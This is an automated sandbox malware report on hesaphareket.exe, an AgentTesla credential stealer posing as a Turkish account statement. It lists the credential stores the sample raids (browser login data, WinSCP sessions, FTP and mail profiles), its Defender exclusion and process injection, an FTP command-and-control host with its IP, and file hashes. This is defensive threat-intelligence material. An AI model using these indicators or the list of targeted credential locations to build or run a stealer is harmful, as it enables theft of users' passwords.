                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Users\user\Desktop\hesaphareket.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareket.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.hesaphareket.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.3823770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.hesaphareket.exe.37e9150.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3772427480.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 6188, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: hesaphareket.exe PID: 7212, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		111
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561748 Sample: hesaphareket.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 28 ftp.normagroup.com.tr 2->28 32 Multi AV Scanner detection for domain / URL 2->32 34 Suricata IDS alerts for network traffic 2->34 36 Found malware configuration 2->36 38 10 other signatures 2->38 8 hesaphareket.exe 4 2->8         started        signatures3 process4 file5 26 C:\Users\user\...\hesaphareket.exe.log, ASCII 8->26 dropped 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->40 42 Adds a directory exclusion to Windows Defender 8->42 44 Injects a PE file into a foreign processes 8->44 12 hesaphareket.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        18 hesaphareket.exe 8->18         started        20 hesaphareket.exe 8->20         started        signatures6 process7 dnsIp8 30 ftp.normagroup.com.tr 104.247.165.99, 21, 49712, 49724 ASN-QUADRANET-GLOBALUS United States 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 54 2 other signatures 12->54 52 Loading BitLocker PowerShell Module 16->52 22 WmiPrvSE.exe 16->22         started        24 conhost.exe 16->24         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    hesaphareket.exe58%ReversingLabsByteCode-MSIL.Trojan.Remcos
                    hesaphareket.exe58%VirustotalBrowse
                    hesaphareket.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    ftp.normagroup.com.tr11%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ftp.normagroup.com.tr11%VirustotalBrowse
                    http://ftp.normagroup.com.tr0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.normagroup.com.tr
                    		104.247.165.99
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://ftp.normagroup.com.trhesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CFC000.00000004.00000800.00020000.00000000.sdmptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://tempuri.org/ianiDataSet1.xsdhesaphareket.exefalse
                      		high
                      https://account.dyn.com/hesaphareket.exe, 00000000.00000002.1333405214.00000000035D9000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3771073304.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehesaphareket.exe, 00000000.00000002.1331722297.000000000262A000.00000004.00000800.00020000.00000000.sdmp, hesaphareket.exe, 00000007.00000002.3772427480.0000000002CEE000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://tempuri.org/ianiDataSet2.xsdMhesaphareket.exefalse
                            		high
                            http://tempuri.org/ianiDataSet.xsdhesaphareket.exefalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.247.165.99
                              		ftp.normagroup.com.trUnited States
                              		8100ASN-QUADRANET-GLOBALUStrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1561748
                              Start date and time:2024-11-24 08:21:38 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 5s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:15
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:hesaphareket.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@11/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 96
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              02:22:35API Interceptor10337704x Sleep call for process: hesaphareket.exe modified
                              02:22:37API Interceptor16x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.247.165.99wKmhzHd4MC.exeGet hashmaliciousAgentTeslaBrowse
                                hesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
                                  EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                    LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                                      hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                                        hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                            hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                              hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ftp.normagroup.com.trwKmhzHd4MC.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99
                                                  19-03-2024_Takas_Sonuclari.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 104.247.165.99

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  ASN-QUADRANET-GLOBALUSsparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 156.239.44.232
                                                  +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                  • 185.174.100.20
                                                  stthigns.docGet hashmaliciousLokibotBrowse
                                                  • 66.63.187.231
                                                  goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                  • 66.63.187.231
                                                  ________.exeGet hashmaliciousQuasarBrowse
                                                  • 155.94.209.8
                                                  PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                  • 66.63.187.231
                                                  ________.exeGet hashmaliciousQuasarBrowse
                                                  • 69.174.98.113
                                                  seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                  • 66.63.187.231
                                                  PO-000041492.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                  • 66.63.187.231
                                                  RFQ541634_A_URGENT_QUOTATION_SHENLE.exeGet hashmaliciousGuLoaderBrowse
                                                  • 64.188.27.210

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hesaphareket.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\hesaphareket.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380747059108785
                                                  Encrypted:false
                                                  SSDEEP:48:lylWSU4xc4RQmFoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyud:lGLHxcIFKLgZ2KRHWLOugbd
                                                  MD5:C149F26ECCA45F5FF907D47A0F31FDFA
                                                  SHA1:5AA35127F59E887C14D3726A59E1C3EAD5C51691
                                                  SHA-256:B3103403C6CEF941A303E03CB7A29A1FAFD2BFB9B7125F1DF126DE55C2D9BCA4
                                                  SHA-512:B33AA9D5A78A9AA35E7C30E27F7A94C6322D45C067A473FA5A23A2A5D4EE8DDDB7CE1014674BDFDDB194DEB18E47D0154D081C66E073911872943D7FF4936BB8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_341u2do4.31i.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
